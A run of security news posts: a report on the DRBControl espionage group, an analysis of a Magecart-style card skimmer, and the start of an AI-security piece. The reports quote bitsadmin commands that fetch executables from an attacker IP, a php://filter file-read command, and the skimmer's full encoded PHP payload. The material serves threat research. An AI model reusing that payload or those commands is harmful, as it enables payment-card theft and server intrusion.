“The threat actor is currently targeting users in Southeast Asia, particularly gambling and betting companies. Europe and the Middle East were also reported to us as being targeted, but we could not confirm this at the time of writing.” reads the analysis published by Trend Micro. “Exfiltrated data was mostly comprised of databases and source codes, which led us to believe that the group’s main purpose is cyberespionage.”

Trend Micro become aware of the new backdoor after the group targeted a company in the Philippines using both common and custom malware and exploitation tools.

Threat actors used two previously unidentified backdoors, known malware families such as PlugX and the HyperBro backdoor, as well as custom post-exploitation tools. One of the backdoors leverages the file hosting service Dropbox as command-and-control (C&C).

The group was also observed using modified versions of common malware such as PlugX RAT, Trochilus RAT, keyloggers using the Microsoft Foundation Class (MFC) library, the custom in-memory HyperBro backdoor, and a Cobalt Strike sample.

The arsenal of the attackers includes post-exploitation tools such as password dumpers (Quarks PwDump, modified Mimikatz, NetPwdDump), tools for bypassing UAC, and code loaders.

In the DRBControl’s arsenal experts recognized two main backdoors (Type 1 and Type 2) that were previously unknown in the threat landscape.

Another backdoor accompanies Type 1 and has the role of executing malware that has been downloaded from Dropbox and loaded in memory.

Type 1 backdoor is executed by employing DLL side-loading, it executes a malware that has been downloaded from Dropbox and loaded in memory.

The malware was used to steal Office and PDF documents, key logs, SQL dumps, browser cookies, a KeePass manager database.

The type 2 backdoor uses a configuration file that includes the C&C domain and connection port, as well as the directory and filename where the malware is copied. The configuration file is obfuscated in a registry key in order to achieve persistence.

Both backdoors implement a User Account Control mechanism bypass, they also implement a keylogging feature.

Researchers observed that a first variant of the Type 1 backdoor was released in late May, 2019, while version 9.0 is dated October, 2019.

The Type 2 backdoor was first released in July 2017, it was employed in a spear-phishing attack distributing a weaponized Microsoft Word document.

drbcontrol

This circumstance suggests that DRBControl has been active at least since 2017, but Trend Micro speculates it had a longer run.

Trend Micro experts believe that this is the first time that the DRBControl group is tracked by the security experts. The researchers linked the DRBControl to other China-linked APT groups, including Winnti and Emissary Panda (a.k.a. BRONZE UNION, APT27, Iron Tiger, LuckyMouse).

Evidence of the links to the Winnti group includes from mutexes, domain names and issued commands.

Researchers noticed that the attackers used two commands issued on a compromised machine to download malicious executables from a domain. One of the executables (t32d.exe) was used in the past to contact a different domain name involved campaigns associated with the Winnti infrastructure.

  • bitsadmin /transfer n http://185.173.92[.]141:33579/i610.exe c:\users\public\wget.exe
  • bitsadmin /transfer n http://185.173.92[.]141:33579/t32d.exe c:\users\public\wget.exe

Experts pointed out that the HyperBro backdoor is exclusive to Emissary Panda.

At the time it is not possible to associate with high confidence the DRBControl group with a specific threat actor, it is not completely clear if the attackers belong to a new APT group or it is a subgroup of a known APT group linked to China.

“Attribution is a complicated aspect of cybersecurity, and it is not the goal of this publication. What we have discovered in our analysis, however, is the existence of a significant number of indicators of compromise (IoCs) and intriguing connections with at least two known APT groups.” concludes TrendMicro.

“The threat actor described here shows solid and quick development capabilities regarding the custom malware used, which appears to be exclusive to them. The campaign exhibits that once an attacker gains a foothold in the targeted entity, the use of public tools can be enough to elevate privileges, perform lateral movements in the network, and exfiltrate data.”

Additional technical details, such as IoCs, are included in the report published by TrendMicro.

Pierluigi Paganini

(SecurityAffairs – hacking, DRBControl)

The post DRBControl cyber-espionage group targets gambling, betting companies appeared first on Security Affairs.

Uncovering New Magecart Implant Attacking eCommerce

Security expert Marco Ramilli shared the results of an analysis of a skimmer implant spotted in the wild that could be potentially linked to Magecart group.

If you are a credit card holder, this post could be of your interest. Defending our financial assets is always one of the top priorities in the cybersecurity community but, on the other side of the coin, it is one of the most romantic attacks performed by cyber-criminals in order to steal money. Today I’d like to share the analysis of a skimmer implant spotted in the wild. So far I am not sure hundred percent that the discovered implant would be an evolution of Magecart – since the activation scripts are quite different even if they do use Magento core infrastructure. We might be facing a new Magecart version or a new framework as well for my current understanding, notes suggestions are always welcomed.

Disclaimer

National law enforcement units have been alerted, few hours are gone after they gave me the authorization to publish this POST. Please if you used your credit card in one of the following eCommerce (IoC section) consider your credit card as a no more private card: call your bank and follows the deactivation steps. Since C2 and Relays are still up and running, in order to avoid replication, the addresses have been obfuscated. I want to thank Daniele B. for giving me the first “wired eCommerce”

Analysis

Everything starts from a vulnerable eCommerce web-site. The user don’t feel anything weird since she would normally get items into her web-chart, surfing from page to page watching and selecting items and finally deciding to check them out by register a new account or just as proceed as guest user. However the attacker could abuse the eCommerce vulnerabilities introducing a nasty javascript sending out information (for example: Name, Address, eMail, credit card number, cvv, expiration date, and so on) to another host, belonging to the cyber criminal. The following picture shows the point.

Fig1: External Connection outside the eCommerce Perimeter

From Fig1 we see an alien connection (HTTP POST) to an external source: https://*****.]com/js/ar/ar2497.%5Dphp . This POST carries out a quite interesting payload as partially (avoid info_leak) shown in the next code section.

touch=86f63747d33786f607e237f62656c6164786f6d656e236f6d662e657d6265627d3431343431333831333737383930303136256870713d3236256870723d32303235362366767d3736353626696273747e616d656d3a4f686e6164716e662c6163747e616d656d3259667965627166216464627563737d35452230366f657e6471696e652230377169752233452230313236236964797d364275637e6f6623747164756d3132362a79607d393336353036236f657e6472797d35535620786f6e656d3535393d2233373d283836256d61696c6d3a686f6e6164716e6524303279636b696e236f6d66257167656e647 .....

The encrypted/encoded data lands to an external gate hosted on *****.]com. This is a slightly difference behavior if compared to the original Magecart which used to send data directly in base64 format. Mykada looks like a legit eCommerce website that could be compromised and used as a relay (one more difference from Magecart). A further investigation on such a rely shows a magento core installation (this is a common indicator to Magecart) which includes the js/index.php (ref: https://github.com/integer-net/GermanStoreConfig/blob/master/src/js/index.php) providing a nice tool to dynamically building-up a composite javascript file for performance boosting and compression rates. By using such a public magento-core functionality and by guessing file paths (looking for known public folders on the host would help you in guessing paths) we might obtain the original malicious back-end file injected from the attacker.

curl http:]//*****.]com/js/index.php\?f\=php://filter/convert.base64-encode/resource\=/home/****/public_html/js/ar/ar906.php

The result follows:

PD9waHAgCmlmKGlzc2V0KCRfR0VUWyd0b3VjaCddKSkKJF9QT1NUWyd0b3VjaCddPSRfR0VUWyd0b3VjaCddOwoKZXZhbChnenVuY29tcHJlc3MoYmFzZTY0X2RlY29kZSgnZU5xTld2dFRFMWY3LzFlMmpETWxnSEYzazAxQTNyd2RMd2hhQk9VaVF1TXdtODBKaVd5eStlNXVnTkRwYUR1b1dLd2RwZDZtdjloUjI2b0Z4UmxrbkU1bkxGcXNVclZlS2xwdC9WZStuK2VjVFVnQ3lvc1Njam5uUFBmUGN6a3hUTjF4cFA1VFp6OS9mdUxUckowYTBsMG1PYTd1cG94MS9STXZqMDgrdU5TNG9XYXphVm54VENxelg5OG9iWmZNbERFbzVhMmNMVEhkTnEwWXE1UDBURnpLWmVLV2VIdFlkNDJrdjJhRE9FZEs1REtHbTdJeVV2L0MxQisvVFYxOGRLdDZYZjhQeDY1ZGZUdjkvZEtNNzlOVW92b0RoNW1KalJzTEpIMGJ4ZXYrcDdNblp2NzQ2OERNaFdvZjJPalViVDJwTkNRTXNKSEdUNTFrRGVwNUVHS1plQ3JSYURNM1oyZWsyS2JPcGxDd1A4NjJ0TWVicXNzUC9xU0U4RDVmNDJlVm9ybjZJSU1NVWxiUHVJNWtKUkoxMG9DZHk3aXB6QURFeG1lNjVOcVdhWUptdWJKS2hDemgrZE55NmhIZHR2VjhkVlgvN0tFTEU1OS9YeFg1YjFXOHVVSHBqY29oZFNBcWg3V3F1cXIrZjJiK2pvN0VZaGZ4YWJuRXZVeFBjdTJEalpRcjJWWnVnSlJjdFZ0dHlNV2JvNG9haW82RXRmaVc2RWhBaVk1b1duUWtwTzNkakVjanFpaGgvRzNZTE9OOWZXOVNibFdUZUJwU2U0YkQyNXZick42OTBaR2dqdDE2SHhiVTcyNklLc0VnM3RQVXFFTG5CQTA4RHc1RWlMMW9RRlhHeDhlWGlQbmRJQnB1MjkrM3QyMFVKSUo0cGJWRmxWQW9sdW5JeDFTY0YzWjM5NHc0UkFsTUJYQXFma1BCcmg1aVZzWkxwUm1rdElDQjdWb1lyOFBkSUtaQkV3cFcwSG1oTGNNREhmS2U3bGE4SDlpOHF6dXF5S0dPSFYyeTFrVzgzRDBmVllQYTdmbW9xb1Rtb2lQMURkZVh1UUpSSFl4RmxiRGEydDAyRk11UU9Qa1lxVm93aHRmaEVTY1dNRnc4VXdLa0FiT3ZlUStwRWlwTGdodTFaV2RvZTB0SFBrNEhrbkJjQVdjdmpEMDY5Q0Fha0lPTHAzN2s5SHFFQ2pnWkNCTEMwakpLcEFLY0JrcGRnUjFRQUxlQ2F1YmFVeEJIK1Q4NjlNdWIwQ3RzWktoUk5ZRFA2K056YjdnRGxMdW5rOVpGNkVsdWtvSXdabGt1K1g4VnpvZ3FBUnhRSDN6OTlaWFR6MytJcXBwR3pJR2VxcEJyd1FCeGI5WEM3VWRUSUtYVDcvUzNLL3lzUFNubDRXcDFvS0c3VW9JeDA1RUd3QVhSMlRFUTRVbzRkaElFQWc4dlIwY2FJR1M5UXFSMjdSYWZIWi82OCs2SlAzLzhkd1gvbmNSOVhlRlBuakdtNjhsazB1Ty8vL2wzYzlGQUlEZzUvcHBPNitwcENPblFYRzludmRKS3h0dzA4UEUyOHN0c0xFMm1IS0xuMERFWkxqN1FaZTRlYU92RVN6aE5XRzdQNDAwVkQ2SGdmdTVaOE95ZEtYd1VDbi9jU1IrMVFBMHFkeE03bHEvUHczazFtQ0xZUlB2aStBMDJrZVhvUlNjQ0tFakJReUZWdjhQc1N6Y0VXMGZGc25CREswNVhONVdvOXNGWEwwN0JOV0RCaG9iVkRKZ21mSEdzTkpOY1MzZGNqcHNNV2tZOEEyd0VlZ0tRL1ZJcmZkTCtJZjRPTWtlSzVWeVg0UlBUbEZJWnNjcXdvVVcvdEJNd1NBb2tiU0NZNUpDSEp0d1NSdzlNL1hvR1lLS0NKZkFmRDZ5d05ia1NCeFN5OVVjNFIyOXVHSTF6aVFwNE5IYnZLWTVRdnZ1T3JCTEw3SEVocDBJbUNPVzUxZTdmT3ZQN1NSd2UvM1Z1RllHemNCOGhjRXpQNEo5RHpQYnRUUTZUQ25jVEhjN3B6T3M1QkxGTVVVVmthTUZPd2dQaFVSZFBqOFBkZ3RFUlBYUUJsQkxrSnRkb1hTL0JTcC9xS2Y5bmVHTDk5M08zVi9Ib09tbVluRm0zR1JkNXdNcGtkQW5wYWpqbEppRzc1VEFTdmkvTjBSS0dOUVJlcVhDU2tFWUM5eWdtUno4VlVScFFBOGNYNXFlUG5iOURQRkJvTjI4YmpUY1Q0TmJIQ051MGd1NStQVXlvQkw2MVMyL3ZVSVN2ME5BQWN5VW9KOHYwVE02RjNYZUpKMUxDdHRKZ2pOUm1tbG5kSGlTOTlmWjBEQnJwUGFQR2NLUkFnWUlQTGgrZW5Mb3cvK2dHQnhDRTVBb05lTWVTa0wycUNlRmt0cHVPOENCZFVTN2NnMmlCY3dzblBaRUNnUTc0dGh3WDNxOFY0S1AvMm0vMy83MDQrVEtxaHJUenRKU2xzU3c0VEI5OWpqZVZHMWNQaXhPUWcrQ0hEWlNNS0Iwd0FRNGNwQUtCd093LzkwZzFNVnByRU9EV0QxR1dTSGR6aHM2L2hNcVV4Vm51Q2oxS1V1OFo1dS9mbkh0ODdjYzMvTzNPYlIzZDNkc2E5blRMZXpyM3l0dGF5RmJkV3JkUVNRTmNKUlo2eVQwS1hnLzVBbU40VUZkby8yT1drWnJ0VkNMQjh0SU8yMDhwbG40OFVPb0NTMnlQQ3ljTFVRb1EvdjRqV0lzZC9BY3dIWGgxWVlXZWUwcTl6TlhOUVNvYzlKaVY0OEhWMFV5cHplM3RNU2xUOCtpNWV3Q015Y1RjeWNjOHduWXJoRTA5OU9IRUlsUVVqcXJod0pXdnI2eU1yUS9Ua3BObEdiY09ZYlkvbDg3Q240Y3p3QWZYNG80RHY0RlVCQ05PMnVLVlMwSjNrUzJveWtuYTFqQUtDR1BRa2NBdnJUWjAxeEU0b3NLYnlVSDZDcG1EMjIxRVN4eUQ1UEVYQjhtTi83MUVyTFlTU0lvSS9lZmdyVCtlUXQrQlpldnp5aUZrOE96ZkxLcVFrTlpIK1JqYjVMVE9hNDVpMkpTbVdDTDI0TzRGRGx5cUdweUh3OGhldElmaXBMb0Fsc3NFeWthdWo3Q2REblI2a2V6QmRvd1RScG5nOW5uNTZNSENPWlFKSVhnbnBhb2crZm1yR2U1RHpRME9wZUxtUFhuUE5hY0p0N0ZJdS80UVVCU2lSZHNwUjBjSzdrK3U5QWlNZ1drOS9PaklDdnQzSlZPT2hQK09tOHVtZU1ic1RadE9qS0xJRkx4bWllMVl6N1pzYkpOZzd3MmgxaXNxcS9DclBiejhKeGVWZGpYVEZ1Z3JPeHB2MldHS2xJWGlBR1laOGJRRWRrTVVSaFNPZDYvZkVrcnlGQTkxQitnSTJqZWFIWTRGMm1TQ1M3VmhrTjd4ZFBQdG8vSEYrL0JscFdDMk5OY3ZZWnJIOHlncE4wL09FSTVucWFnTFFMdEJwT2JkQlZOTi9nRTJBbytCMEtFaUF5YXZlRWlBMGV4K2ZXK0h3Q28xRktKTUVmdCtDYTdDWVd0bGplQmFHU1p0c2N3NG5ySWhKbTNLT2FpK3BZSFVFUEpnMmt1ZU1jYnNvbktiemFKblpmZkhBcFNaY3ZFV1VkR0NXYVJ0MVJ3ayt2UGZnTHBlVDBubStZM2JLOVVzRjZxQ0VjSTB3QklBY0FqVkJnRzZaLy9udjV5QXZoUFRFeThnYzNoMmdxc054UUVTZ0w1VjVpbzlkK1g0RlhoSWVPWWhSUFgwcXFnRUpjUlowcXVTU0hFelkvZklLUmRmSCtHVldwcmtDQmVxcUJkUDV1OHRQS0lQdWdkcFl4dVY0SlRmTzdhUlNBQzJZS2lKbmdjYlJOVjErZFE5RUF6KzloZnQwVnM2Wk9Td1lQM09VR3UrZ1NCTUM4ZE5nME95WXFUYlNFQlJzdU5rcFZXTko2bnMxVFJDNFFEWDNSQnJHZVFISDVwRi9JVy9nTmo2d3ExSjNyT2t0MUhKcERSblIvZUtLamNZeXU5YVR1YVVKTzljaERlSDVwWUkzZTUvNlFWVHVhbDdkRXJDUFRaelhKT1ZHSjZRc3AxRGkwaHlhTk0rUTR1WWNoem1scC9RNjFXUWhOWm9LWGUxZDNaOUlscFp0STdGWHBQcmVqYXF5aHB2dW56N2ZMNk5MVTJidGpiWjFhc3NwdjdyNTR0VlBsOWprdWxibXpwV1hmT0VkMEMwQnVldzFkZmNoYS9KbFBwdlUxWStQbmNVVGlHTFBYcDg5WE1KZ3M0Q3F3TFVZZHlsOXNKWDJmWnVTQTFrTEp2VmJGanVOOStjT0hqMGM0Zy91M1QyOXU5ZitqNWQxLy96ekpNakUzOHZYbDY0R25rSEZjU2Zlbk5wL3V4WGFETjhqUW5MeHY2bHQxL2R1M3htNmQ3dnM1RnFPUnlxWFM4cklSVVBzcUpXWkI3VUo0WmxvYTdqTmpNb1dCM2trR0VkNlVTS3BkRDhJKy9raDNscnZsNmlJOEloWDhVWW9ZZngyZ2NDSkhVYm1jcmhxY3BPeGRseUNuTnlHZGdjaDVReTl4K255MjVsbVdXQmNYQ0Vmc3FYMVViV3kxb2w1OExsakh5TTJmQXlTS2lGNVEwMVcxTzJtLzhZdlR3S2dqcXF0WkZKTXg4aUx6TFUyeEFrWnNYelV1TjZueEFHNXFtRlJFSEZoNzcrcDIvL1B2ckY5OGNpbmQyYndWYVJwN3BTVHVxZ2dFQ29qRXhQMGlwVUNSOTVLZ3FFZlkzcitoZCtQM0hwOVdURXliMzd1TnBxNk1kbnQrZmF0bGJML2tEWlQyM2xHNVVsQXdCMXdIS2xtR2xCMlVrOVpVTmVNOGNrbG1jTzFSSERsajBvb1ZxQkhVM0xoWW9xRC9TUk5Gb0lHZ2lxbkcrTjJGNTJPUCs3UEc1TTlLVlRWVDUvUVV4L1VYK05MQk9IRXhZbU9OMGRyZkVtdzRxejZ0S2pnUVBMVHYvZzV1M3BveGZLdlA3eHRTT3pCeVlqYkdSWHE3VzFhZFdZUkNTR2JqK2lPb1o2M3dlVXNxaVFxL0xWTFh0VFdmaUlnVTJsNzI2QzhyWkRmVU5VVmFFNGg2dWtrSlgyV3pFcHpreGtLcHZLUGdnazdkS3p1clREU21ZK2RLaHpTK2VsWm1ZUjF0blV0YTJNdS9WeVVBM1cwZ1BSTFBHWVh0U1RqcFdqYW82TjVQMVV4Y1VRUGxSbUR1c1oza1BnZk5Fd0dEQ2gxMHNhdXUydmpKOXlXWGJxaUFhUlZTMXN0N2tvZmtFdmFlVVEyZ2ExbmJsc21Td1VxN3lYMVRPU1pjZVpYYlBCU2ZXeDltM1ZCVHVRSWt1Y3RyWk1taFk5cVg4Z3RYOWNzNEdDYU82blArNWRHWHNjWVh0M21lMWIyYXFXTzNieWFzbTBnZXdseUh4U1NtV2ZyeEdKb2pQVjE4UVo4YzcxL2FjUU1aazRJaVpVK2hPdXJYeWpuRThnZ1BVQjRpYnVUZjh5RWh0eGJYMTkwOTZ1amsyU3Fkc0Q2TjFTbzZNNktuQzA4M0U3bGMyUzdYbGY2ZWc1Zy9sNUVKWFRRQUl5TEJvcTVsaWpHRjJXT3QwblJjNC84Ump2SnNacjVVb0FOYzA2S1pHeUhWN0I1eEc3WkMxSHo5ZEpWWnh4bXVDSWNyVEVkSFZTRXJWL1dzK1RCek16UzM1U1JTdFpSaHpEVVUrTW1CZzFHRVpLTngweDRlV0x1TXR4VW1reExJV2JjUmZ3UzUwV255TncvNUQycm04bDlmaEZUK1JhWERHT0pHYkUzR2tKZ3N2aGQ3dHdadFI5ZGg2OFp3WUFUM29zL3dIOFpOKytTTGZkR21kR080ZUZNZzExSURBSURGV3R0dmhRZ1h5TzBJVmVDTkE4SjQ1MUtBZkswYWZVRktXSWMvalMxTk94ejUrZmVnbnExNzVaUFBQaytzU1hKMytDSTA1K2Yrem8yMnZQM2k3OFFpaDA2OGJGaFgvbkQzcklVY1RxZUhXd0lWelArU3FSdHp1ZDl2djl2Y3dCTTk3bmxYL0wxbmR5NVgySXpCRWppQ0ZQSXlzSkQwVFNCTDRnWmgwbVphemhqNlF0T2oybFBqRko0YTBEOUJuSWNWTlNFNWpLRE9KVFdKdFB2WFdLOTJHWWtRRERWMW1zTmRNQUVKa2ZubDNjUUcwdEhERGhNcmhGR3Q3c29rUUhGNmdOQmtzY2hwTkFaQXpSMEV2NEMyY1NaRnc3eHpiVTFOUmtpVlA4M1ZEbjJiTWJDbE9DdGZ3LzUyVlpDU1NQYnFZdGgyaG5VaWc4NGlMY0lIeFJBcWtsWjl0NW9CWmNKd0gvWmQ3QjdkM0lta3FndHZCL2haeUVlNFpPMlQvSlQ2REJwOUN2eDI1ZFNmcFZOVlh6YXl2YmNvc2pQZW9mc2dPTmwzSURTVmhZTEMvL3d4a29VY0NxV1V0VlFvV1pxcTlBbnpTa3lYSkRMVDNnbE5VMlB2OXU3ZzJOVXlscGE1cjZEbGRDZElMYmhBMUVRblFpYVlGcEt0eFFrOGhBSFZVSkJzdEZiSUZROFZTY3gvRWdlVnJOaHNoL2wzWFR3WUZXYVZpaEdWcE1RK3VjeUZ1ZW1wbHVVL1l5dUxONkxIbXB6RE1uOGJwZE1tbFNscWNMRlh3czNHdFlOd2Z4d2tIUlNBa3htM05Md29GUFE2ekN0TlJLSkJqOFQ0K1pISkZYY3JmSkc5cllURWUxQjBlbDZqU2pPMjVlWU5CSDNMS29jSk9vbjNpaEs4aFlReXhUUExCRXY1WmxKY1VnblZoelhKYmxkUlVTODdKa0loSzVQNXZTTUJQallDcW5BWnE2blNhMUlPOFNkWThDN0N5SHdqSVZybkpGT2xpMkovcGxNU2NXMVFBTmU2dzBiQVFuVUZWTmxMQnFlVXp4dTZVNnpzcXdyWXNVUm9BeXpGQUEyN3pzRUtxblJxc0UwdVJhL3Q5WEo2T1hWQ3JORFFQRGwxQklaZ1lnSy9xOGxGTmlJRktMbFdVZW05YUlkNGM0bXNxU080b0x1RUpjaThva2lSVithWlBEeDhvWmhqenNNcjRiUVlyRVpTUVpRNkRUbE4zU2FSQW1NY054ZFNQdmw3cXdLSjF6dUNaRThiTGQxYzBVVmlGSE96cVNPRlhqL0VaTk5BRGNScFMrS1h0U3lqQlNnQ3dUQ0dOWlBESHhBc3lrVEpxSGdIcWN5RGtNV1QzdWNCYjVZSjFSaFZocUJXS09qYVJjUG9FRE1mN2hjdVQ1T2ZaU3Z4VFFLdm9GYjB5WHlCbURQTnlLSlExUWlNQmsrUmZHQ0dqVXZhRzRqZnlYZzkrS1NqTExiT1JBbHhHME1RZ0pyM1JxYXR3Qy9vSTNvRnRRcm5EcGJUVTFnNVNvWkErMnZLN0xJL0h1UG90SzJaMVdPcDNmQ1VVNkRqbHJ6b2FoU0VlODF4dGlDRFlLVFJwUW80SXJ5NmtiaXpuMWt5SzhBTU1WZjFpckxYbXNZSUFVeGt1MkFSMjFTWVk3ZElZTFNZbWY3L0R0aTVSVkQxb2xseUlvcURUbUpsKytLQkUxSGU5OENxekpha0NUd3hSaFliVWlNdHR5dEYyaTJvSlBzQ2c3V0NRL0hCWnd5T3NTUUFNWkh2RVpDcTVNU0RFVUtBUTBOdUVTMnVVaDVyZ0MxMnc5VGhuUTRSd0Z0V0FndUM5U3FyMWllVGx4OU1xUmJ5SUdTcWorVkZ1cXE2eUc4VFVhNkxqNm5TWVVhVzYvYm5lZ2NQRjIxQlVsSkdHbjd2N3k3OWpYRVNPSDFXeWthVXRobGE5WU9va1ZzSGMxejJob21UK3IxR3JLRVJlTEtiTEV1djdwRjk4ZS92VmhwTkRRRmFjWjd4cm0wQWlXbW9ENGkxTzN6MFZINGdZZjZGRGQvMEhoTU45R2lyR2k2SmZIYjAwdG5mbzZVdmg0MVZPUDBqU1Nia1dWTXpkK2ZZWXpzZkh3d1ZzSHh4N2ZPWEgwMi9mdkhidjNkT2E3cUJwVXhMYmY3aThjbjMvL2p1ZDA1WExyRE1qVmk2c3pHaGlLM1NmL1B2dm03d2N2SngrODl3UngyUnRUWHRQRzhidGk2NVdsbTRmdkg1cSs5SDdhRjArUC84VG40U042Z0NaN2I2N1I3cFZPTjZ6VGxTUDNNdGRLNnk1OUtVSjhyV05kL3c4L3Z6ait3OHloOTdQSTU5T3gyRGdSbTd1OWtraDV4cVZ1bVpjaHpFbEtXZHVLQTN5NWc4d2RPbjEyN3RuN1pUcnpqR3FraFhuSXhQQXNDSkx5SFVHeDNQbTI4eUVWTDMwcG9vRjdGTlIxMUZUbmRPUTZBMGxuZTl1ZTl0WTkyOXVhUzNDSlNzb3R1bWgrZU51VDRpT1NsRXVqUzRwbTNwWUxJUVRibC82NGR2bUhIOGF1Ly9SK3pzVU40YVZMYis4c0NTTSttNXUrOFdqcTZ0djNiL3M4T2hKT1RFNWRpQVprQklQQjZLNWsvcVNRdUJoNjYvcS9tUDdwMm92bjd6L3FQZzBjY1U1NDh0d0N2enZrYkJ5OU9IWDc3STFiYXpvaDNRZEM2OEZKdUhFOVhZeWNGL3N2SG52NTZ2VC80Qi8xeWd4ZEdmSTlYeDQ5Zm01eC9QM2N2cVpwdEhZdnFzcWhDYkhyd2FYeE4rZmZ2K244eSs4V1o4WHE2OCttRDVCdU81czY5alIxckxxYWJobWpxaWEvOGJhOGVEbjU1SmU1eDQrTHc2RGx0MWJkLzgzTmwrTjA3Ymc0OWdBSFJFcHhaSzJ0ZEQxeDllQS8zNzY2SUhaNjBMWFd0dWQzRC96KzRPUmp1alFWK3dwSXNNWkdNdURFNHBHZjZYcVI3K1BRNVY5MS9qTDE0dURTdjVmNDlLNElVV3NkRHd2L2MvQVdzQzc0ZE9Ld29PQWh4Ly9BbUhjRCtNMzhTN0ZUNE1DS0w2TzVWczVJOHJnczFQcG9GRnlBUjUwWHJBNnY3Nmc1UkZtckE4QVF5cDFJRUdhZVE5bWFiSWpid3h0ams2OW15a1R3djBQaTZYT0hyajljNElyeVdGN0Rlb3VQWnVrMmtjTDRpS0RBWFhxdGJXL0dYejJoRzBPb1Y3djhwOWhZQkowVmF1S0RkYTRlK2k0SjNmeldGZW9aR2gweDZnUFRLTmVBajNUUkJtQWNzSFcwVm12cXFQLzB4Q3hkUFhMNkhtcXM3ZVlOTVlGYTlmV0xsQXJQaWUwQ3JsYUFkak54Z2dLWk9kUXdJbDJZS01UNW9KaFhVMzQrRFMzRGRZN0lOTzhROHhFemxSRXlHUWhoeXhVZHdHak9NSkkwUUZoYlJISERDVWJEMDRMUkFraFhxQmxPVmp5VjAyS093NXppSkpaSXIwM3M1c25YNUhCTFJ3OElXaHhKS3dodDFkTVozaGQ2VldCcUlPbDYwejRxY2FuR2FtbnZXcHZXL0RjbmY3eExkNkdja3NCZk10Nk5INStjdm5veXNsbDM2SnVVckcyTHRaVlY3M2VzdHY2bU5vT2VMNS9yODVWc1FHSEkyb3gyc1VDOFJ4OHYxNk9SMWFzaE5heWQrSHA2QXFnWm9zdkQyUWtlUHQ0Sjd3bzB4S1dtSHI4eVIxODdlZmdFTzBDOXFZMS82ZFBEZWQrcVVEWXpSdGxPM0x3aWo0UTVyZmZrQStKS1hNWWlIWlNNQVZkZlc4OHVuN3FIK2s3Vy91Smo2cEpPWm9WajgzYVBHVWxMV24zc0kydmk3dlhMQldoSW1RU2pPOTErZXhOZC9LRHRXUytIZytqMVFrRTVyRlJjOU93VThaSEtPdkI5eDBXVFRaVUpiMnF0aENzWmRyNTRRMkNpci9EVEJqRkhjVVJnMFJTUG1RenJkR3EzY3huMHNrNVNUTFhzdFBoV2lac3lCdk0wdHpGVENaT1BNNmljb3VPb2xTRytna0c1VXVUbFRoYk5wT2dGOEpEVzQyWXE1b2daQzNvaFY1ZlE4QmNQVXBSUXhVVmVMM1Ztd3pTcDNvNDRGeFdreHlTaldVVXBXM1Y4dk1MYkp6R3NwZ0d3TjlIT1pZdGZxS01yTUwvVWhwWitlVGpsTU9obWMwME5MM3Ryb1hSWmxlV3c3MTBlU1FWOTRPS0x1YVhmNy9QcjhpcGZZMGtuMHZqL2ZlODJwdz09JykpKTs=

We are now facing an initial stage of obfuscated .php code. The following image (Fig2) shows how the attacker obfuscated the first stage. You might appreciate the activation variable “touch” which would activate the process in both flavors: GET and POST. Once the activation variable is found a compressed and encoded payload is fitted into a multiple variable concatenation chain and later executed (eval).

Fig2: Payload Stage 1

By following the reverse obfuscation order chain we will end-up in having the following code (Fig3). This time the attacker used more obfuscation techniques: from charset differentiation, junk code to spear random comments making quite hard the overall reading. But taking my time, ordering every single line, substituting variables and encoding with my favorite charset I was able to extract the decoding loop and to quickly understand the Payload behavior

Fig3: Payload Stage 3

Indeed, once the script decodes the received payload (by rotating on charsets with hard-coded strings) from the compromised eCommerce (Fig3 decodes touch variable content), every stolen field is ordered into a crafted object and is sent to one more external host: https:]//^^^^^.]su/gate/proxy. The following code section would help us to understand the execution chain.

REMOTE_ADDRContent-Type: text/html; charset=utf-8Access-Control-Allow-Methods: POST, GET, OPTIONSAccess-Control-Allow-Credentials: trueAccess-Control-Allow-Origin: *%&=Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20120101 Firefox/32.0touchhostnumberexp1exp2cvvfirstnamelastnameaddresscitystatezipcountryphoneemailHTTP_USER_AGENTNumberDomainCVVDate/billing:firstnamebilling:lastnameHolder billing:emailbilling:street1billing:postcodebilling:region_idbilling:citybilling:country_idbilling:telephonehash=&ua=&ip=https:]//^^^^^^^.]su/gate/proxyvar js_ar=;

We actually have one more host that need to be analyzed. By taking a closer look to the used domain, we might agree that it looks like the ending proxy gate which stores data on a given database (mongodb). Again by enumerating and seeking inside its public information it was actually possible to spot and to enumerate the used technology to store the new malicious implant (docker compose to build up the infrastructure). By spotting a temporary directory – used to store temporary files between the attacker infrastructure – I was able to build up a simple monitoring script which revealed the most used compromised eCommerce.

Attack Magnitude

From the command and control host we might observe what is actually passing through it, but we might have no idea about the overall magnitude of the infection chain since many eCommerces could have a low selling rate (rate of customers during my monitoring phase). In this case even if they are compromised, it is very hard to discover every compromised eCommerce by using this technique: looking, converting and importing temporary files generated every time a data leak happens (every time a user adds his credit card). So we might ending up with another method. Fortunately the host reserved a PTR (Pointer Record) to mo-------.]fvds].ru as shown on Fig4.

Fig4: PTR on ^^^^^^.su

The new host (mo-------) definitely recall the mag^^^^^^.]su registered email address (mo------@protonmail.]com) in an unique way. BTW It is active since 2019-07!!

Fig5: registered eMail Address

According to URLSCAN, using the PTR record in order to understand how many known websites have links pointing to mo-----.]fvds.]ru, you might find something quite worrying (as shown in Fig6): more than 1400 potentially infected eCommerce. Now, I am not saying that every single eCommerce in the list has been compromised, but taking randomly 3 of them (and reported in IoC section) I found the exact infection chain on each one. So potentially every eCommerce on that list (so that points to the command and control) should be checked.

Fig6: Link on m——–fvds.]ru

According to urlscan.io most of the websites pointing to momo--------s.]ru respect the following geographic distribution (Fig7). Most of all are US based followed by RU, NL and IN. While it’s hard to say that it is a targeted attack against US eCommerce websites, stats (Fig7) are surprisingly talkative.

Fig7: Location of Possible Compromised eCommerce

The original post is available on Marco Ramilli’s blog:

About the author: Marco Ramilli, Founder of Yoroi

Pierluigi Paganini

(SecurityAffairs – hacking, Magecart)

The post Uncovering New Magecart Implant Attacking eCommerce appeared first on Security Affairs.

5 Ways artificial intelligence Is Being Used to Keep Sensitive Information Secure

Artificial intelligence is an immensely helpful tool for businesses and consumers alike, how to use artificial intelligence to secure sensitive Information

Artificial intelligence (AI) is an immensely helpful tool for businesses and consumers alike. By processing data quickly and predicting analytics, AI can do everything from automating systems to protecting information.

In fact, keeping data secure is a significant part of what AI does in the modern world, though some hackers use technology for their own means. 

The more we use artificial intelligence for protection, the more likely we’re able to combat high tech hackers. Here are just a few ways AI is securing our data.

1. Early Detection

Many hackers use a passive approach where they infiltrate systems to steal information without upsetting operations. These passive attacks can take months or even years to notice if found at all. With AI, businesses can detect a cyberattack in advance or as soon as the hacker enters the system.

